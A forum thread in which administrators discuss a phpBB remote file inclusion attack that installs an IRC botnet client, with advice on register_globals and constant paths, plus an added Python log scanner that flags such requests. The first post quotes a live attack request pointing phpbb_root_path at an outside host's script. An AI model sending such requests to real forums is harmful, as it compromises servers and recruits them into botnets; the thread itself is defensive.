new phpbb irc bot


  • new phpbb irc bot

    Just posted to [email protected]

    Not sure if anyone's watching their httpd logs, but if you run phpBB,
    you're probably getting hit with a bunch of something like:
    /forum/admin/index.php?phpbb_root_path=http://www.kacaktc.com/webs/lol1.txt?

    It is, of course, an IRC bot. Started at around 11:30am EDT (GMT -4).
    *hates exploit coders with a passion*
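
Added example, not part of the original posts: a check over httpd access logs for the request pattern quoted in the first post, where a query parameter such as phpbb_root_path carries a remote URL. The function name, the sample log lines and the hosts and addresses in them are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request line of an Apache common/combined log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# A parameter value that begins with a remote scheme, which is what a
# request like ...?phpbb_root_path=http://... puts in the query string.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_include_attempts(lines):
    """Return (client_ip, path, param, value) for every query parameter
    whose percent-decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # malformed or non-request line, skip it
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_VALUE_RE.match(value):
                hits.append((m.group("ip"), target.path, name, value))
    return hits


# Constructed sample entries; timestamps, hosts and addresses are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:11:31:02 -0400] "GET /forum/admin/index.php'
    '?phpbb_root_path=http://remote.example/bot.txt? HTTP/1.1" 404 312',
    '198.51.100.7 - - [01/Jan/2000:11:31:09 -0400] "GET /forum/admin/index.php'
    '?phpbb_root_path=http%3A%2F%2Fremote.example%2Fbot.txt%3F HTTP/1.0" 200 5120',
    '203.0.113.5 - - [01/Jan/2000:11:32:40 -0400] "GET /forum/viewtopic.php'
    '?t=42&start=15 HTTP/1.1" 200 18233',
    'not an access log line',
]

if __name__ == "__main__":
    for ip, path, name, value in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{ip} {path} {name}={value}")
```

Parameters that legitimately carry a URL will also match, so treat the hits as candidates to review alongside the response status and size logged for each request.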

  • #2
    Yeah I've been seeing a lot of these recently. Luckily I thought about this when we switched to relative paths and vBulletin doesn't have the problem thanks to constants.
    Scott MacVicar



    • #3
      What does it do? How was it put there?
      Arcade.gs Game Site!



      • #4
        Originally posted by xjuliox:
        > What does it do? How was it put there?

        I looked over the code, but couldn't find how it uses that GET to exploit anything. I didn't dig too hard into the code, however.

        As for what it does, it compromises the box and spawns an IRC client to join a botnet. There, it scans what IPs the botmaster tells it to, and compromises those boxes, as well.



        • #5
          Originally posted by Scott MacVicar:
          > Yeah I've been seeing a lot of these recently. Luckily I thought about this when we switched to relative paths and vBulletin doesn't have the problem thanks to constants.

          So if I was coding something, how would I have it accept only relative paths?



          • #6
            Thank YOU!!!
            Arcade.gs Game Site!



            • #7
              Originally posted by Chousho:
              > So if I was coding something, how would I have it accept only relative paths?

              You'd use a defined constant rather than a variable for a start, then you would either have them define the directory or use getcwd to work it out.

              Or just use relative paths and don't fix it with a variable.

              The exploit probably needs register_globals on so you can get it to work.
              Scott MacVicar



              • #8
                Originally posted by derfy:
                > I looked over the code, but couldn't find how it uses that GET to exploit anything. I didn't dig too hard into the code, however.
                >
                > As for what it does, it compromises the box and spawns an IRC client to join a botnet. There, it scans what IPs the botmaster tells it to, and compromises those boxes, as well.

                PHP Register Globals.
